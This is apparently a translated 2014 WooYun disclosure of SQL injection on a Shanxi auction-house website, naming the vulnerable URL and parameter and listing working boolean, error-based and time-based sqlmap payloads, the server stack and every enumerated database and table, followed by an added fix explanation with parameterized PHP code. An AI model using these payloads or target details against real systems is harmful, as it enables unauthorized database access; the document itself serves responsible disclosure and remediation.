Vulnerability summary

Defect ID: wooyun-2014-058937

Title: Severe SQL injection at a provincial auction house (33 databases and 410+ tables compromised)

Affected vendor: Jinzhong City Auction House, Shanxi Province (山西省晋中市拍卖行)

Author: Anonymous.L

Submitted: 2014-04-30 11:11

Fix time: 2014-06-14 11:12

Published: 2014-06-14 11:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-04-30: Details sent to the vendor; awaiting vendor handling
2014-05-05: Vendor confirmed; details disclosed to the vendor only
2014-05-15: Details disclosed to core white hats and relevant domain experts
2014-05-25: Details disclosed to regular white hats
2014-06-04: Details disclosed to intern white hats
2014-06-14: Details disclosed to the public

Brief description:

SQL injection vulnerability; 33 databases and 410 tables obtained.

Details:

1. First I ran this URL: http://www.jzauction.com.cn/xwjt.php?xx=1183
Here is the screenshot of the run from the DOS prompt first; since there are far too many databases and tables, I will paste the output directly further down:

1.png


Target found, continuing:

2.png


Look, 33 databases:
available databases [33]:
[*] blfysj
[*] dssk
[*] hsfda
[*] information_schema
[*] jwhr
[*] jxfda
[*] jzfdasj
[*] jznj
[*] jznjsj
[*] jzpmasj
[*] jzyjs
[*] kfqsj
[*] klsj
[*] lsfda
[*] mysql
[*] paimai
[*] police
[*] pyfda
[*] qxfda
[*] root
[*] syfda
[*] test
[*] tgfda
[*] tuangou
[*] web
[*] xncoa
[*] xncsj
[*] xswjtsj
[*] xswsj
[*] xyfda
[*] ycfda
[*] ysfda
[*] zqfda
Continuing: so many tables, see below; the screenshot can't even fit them all, there are far too many, so I will paste the file into the proof section instead:

3.png


Proof of vulnerability:

Injection point:
Place: GET
Parameter: xx
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xx=1183' AND 5153=5153 AND 'bpsV'='bpsV
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: xx=1183' AND (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(CHAR(58,107,120,113,58),(SELECT (CASE WHEN (3647=3647) THEN 1 ELSE 0 END)),CHAR(58,121,114,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'uYsM'='uYsM
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: xx=1183' AND SLEEP(5) AND 'QTfz'='QTfz
---
[23:16:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database names:
available databases [33]:
[*] blfysj
[*] dssk
[*] hsfda
[*] information_schema
[*] jwhr
[*] jxfda
[*] jzfdasj
[*] jznj
[*] jznjsj
[*] jzpmasj
[*] jzyjs
[*] kfqsj
[*] klsj
[*] lsfda
[*] mysql
[*] paimai
[*] police
[*] pyfda
[*] qxfda
[*] root
[*] syfda
[*] test
[*] tgfda
[*] tuangou
[*] web
[*] xncoa
[*] xncsj
[*] xswjtsj
[*] xswsj
[*] xyfda
[*] ycfda
[*] ysfda
[*] zqfda
The tables belonging to each database, sorted by database:
Database: tgfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: jznj
[12 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| njbt |
| njts |
| tblnews |
| wjxz |
| zyadmin |
+---------------------------------------+
Database: jzpmasj
[17 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjxz |
| xxxx |
+---------------------------------------+
Database: jzfdasj
[23 tables]
+---------------------------------------+
| admin |
| jzxx |
| lfj_artic |
| log |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjadmin |
| wjlog |
| wjxz |
| wjxz1 |
| xdradmin |
| xzxdr |
+---------------------------------------+
Database: jxfda
[11 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
| xdradmin |
| xzxdr |
+---------------------------------------+
Database: xncoa
[14 tables]
+---------------------------------------+
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblnewscal |
| tblprivilege |
| tbluser |
| tblviewhist |
| wjxz |
+---------------------------------------+
Database: qxfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: tuangou
[46 tables]
+---------------------------------------+
| cenwor_system_failedlogins |
| cenwor_system_log |
| cenwor_system_memberfields |
| cenwor_system_members |
| cenwor_system_onlinetime |
| cenwor_system_report |
| cenwor_system_robot |
| cenwor_system_robot_ip |
| cenwor_system_robot_log |
| cenwor_system_role |
| cenwor_system_role_action |
| cenwor_system_role_module |
| cenwor_system_sessions |
| cenwor_tttuangou_address |
| cenwor_tttuangou_catalog |
| cenwor_tttuangou_city |
| cenwor_tttuangou_express |
| cenwor_tttuangou_express_area |
| cenwor_tttuangou_express_cdp |
| cenwor_tttuangou_express_corp |
| cenwor_tttuangou_express_printer_log |
| cenwor_tttuangou_finder |
| cenwor_tttuangou_metas |
| cenwor_tttuangou_order |
| cenwor_tttuangou_order_clog |
| cenwor_tttuangou_paylog |
| cenwor_tttuangou_payment |
| cenwor_tttuangou_prize_phone |
| cenwor_tttuangou_prize_ticket |
| cenwor_tttuangou_prize_ticket_win |
| cenwor_tttuangou_product |
| cenwor_tttuangou_push_log |
| cenwor_tttuangou_push_queue |
| cenwor_tttuangou_push_template |
| cenwor_tttuangou_question |
| cenwor_tttuangou_recharge_card |
| cenwor_tttuangou_recharge_order |
| cenwor_tttuangou_regions |
| cenwor_tttuangou_seller |
| cenwor_tttuangou_service |
| cenwor_tttuangou_subscribe |
| cenwor_tttuangou_ticket |
| cenwor_tttuangou_uploads |
| cenwor_tttuangou_usermoney |
| cenwor_tttuangou_usermsg |
| cenwor_tttuangou_zlog |
+---------------------------------------+
Database: lsfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: police
[33 tables]
+---------------------------------------+
| tblapprove |
| tblarea |
| tblareasub |
| tblcase |
| tblcase_deal |
| tblcase_receive |
| tblcase_search |
| tblchargebill |
| tblchargebill_detail |
| tblcode |
| tblcourse |
| tblcourse_zhouqi |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblhouse |
| tblmodule |
| tblnews |
| tblnewscal |
| tblpeople |
| tblpolice |
| tblprivilege |
| tblreturnbill |
| tblreturnbill_detail |
| tblshop |
| tblstudent |
| tblstudent_course |
| tblstudent_course_new |
| tbltest |
| tbluser |
| tblviewhist |
| tblvisit |
| tblvote |
+---------------------------------------+
Database: jznjsj
[12 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
+---------------------------------------+
Database: blfysj
[16 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjxz |
+---------------------------------------+
Database: klsj
[12 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
+---------------------------------------+
Database: xswjtsj
[12 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
+---------------------------------------+
Database: pyfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: syfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: xncsj
[19 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype20131128 |
| tbldoctype20131128new |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| tblwebset |
| title |
| vote |
| wjxz |
+---------------------------------------+
Database: kfqsj
[16 tables]
+---------------------------------------+
| admin |
| jzxx |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wjxz |
+---------------------------------------+
Database: paimai
[5 tables]
+---------------------------------------+
| tblarea |
| tbldoctype |
| tblmanager |
| tblmember |
| tblnews |
+---------------------------------------+
Database: zqfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: dssk
[5 tables]
+---------------------------------------+
| tblarea |
| tbldoctype |
| tblmanager |
| tblmember |
| tblnews |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------------------+
Database: xswsj
[15 tables]
+---------------------------------------+
| admin |
| tblapprove |
| tblcase |
| tblcode |
| tbldoctype |
| tbldoctype_right |
| tbleventlog |
| tblmodule |
| tblnews |
| tblprivilege |
| tbluser |
| tblviewhist |
| title |
| vote |
| wsbm |
+---------------------------------------+
Database: ysfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: jwhr
[5 tables]
+---------------------------------------+
| tbledu |
| tblgive |
| tbljob_person |
| tbljob_person_ori |
| tblwork |
+---------------------------------------+
Database: xyfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: hsfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+
Database: jzyjs
[12 tables]
+---------------------------------------+
| admin |
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| title |
| tsadmin |
| vote |
+---------------------------------------+
Database: ycfda
[9 tables]
+---------------------------------------+
| lfj_artic |
| lfj_cen |
| lfj_fid |
| lfj_jbb |
| lfj_member |
| lfj_roll |
| lfj_sort |
| lfj_tid |
| tsadmin |
+---------------------------------------+

Fix:

Filtering.
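As an added illustration of the fix (not code from the report, and not the site's own source, which the report does not show), the snippet below contrasts the string-concatenation pattern that the sqlmap payloads above exploit with a prepared-statement version of the same lookup. The table name news, its columns, the connection details, the database account and the function names are all assumptions; only the parameter name xx and the schema name paimai come from the report. Filtering alone is brittle; binding the value as a parameter keeps it out of the SQL grammar regardless of its content, and the mysqli API used here is available on the PHP 5.1 / MySQL 5.0 stack the fingerprint shows.

```php
<?php
// Added example, not from the report. The xwjt.php?xx=... lookup as it could
// have been written. Table "news", its columns and the connection details are
// assumptions; the application's real source is not shown in the report.

// --- Vulnerable pattern (hypothetical reconstruction) ---
// The payloads in the report ("1183' AND 5153=5153 AND 'bpsV'='bpsV") only
// work because the value is spliced into a quoted literal in the SQL text,
// so a single quote in the input ends the literal and the rest is parsed as SQL.
function fetch_article_unsafe(mysqli $db, $xx) {
    $sql = "SELECT id, title, body FROM news WHERE id = '" . $xx . "'";
    return $db->query($sql); // input becomes part of the query grammar
}

// --- Fixed pattern: validate the expected type, then bind the value ---
function fetch_article(mysqli $db, $xx) {
    // xwjt.php?xx=1183 carries a numeric identifier, so anything that is not
    // a plain digit string is rejected before it reaches the database.
    if (!ctype_digit((string)$xx)) {
        return null;
    }
    // Even without the check above, a bound parameter is transmitted as data,
    // never re-parsed as SQL, which is what actually closes the injection.
    $stmt = $db->prepare("SELECT id, title, body FROM news WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $id = (int)$xx;
    $stmt->bind_param("i", $id);
    $stmt->execute();
    // get_result() needs mysqlnd (PHP >= 5.3); bind_result() works on PHP 5.1.
    $stmt->bind_result($id, $title, $body);
    $row = $stmt->fetch()
        ? array('id' => $id, 'title' => $title, 'body' => $body)
        : null;
    $stmt->close();
    return $row;
}

// Connection details are placeholders; "paimai" is one of the schema names
// listed in the report and is assumed to be the one this page serves.
$db = new mysqli("localhost", "app_user", "PLACEHOLDER_PASSWORD", "paimai");
$row = fetch_article($db, isset($_GET['xx']) ? $_GET['xx'] : '');
```

One further point the sqlmap output supports: the account behind xwjt.php can enumerate all 33 schemas, including mysql and information_schema, so beyond rewriting the query, the web application's database account should be granted privileges only on the schema it actually serves, which limits what any future injection can reach.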

Copyright notice: please credit the source when reposting: Anonymous.L@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2014-05-05 08:40

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Shanxi branch center, which will follow up with the website's administering organization for handling.

Latest status:

None yet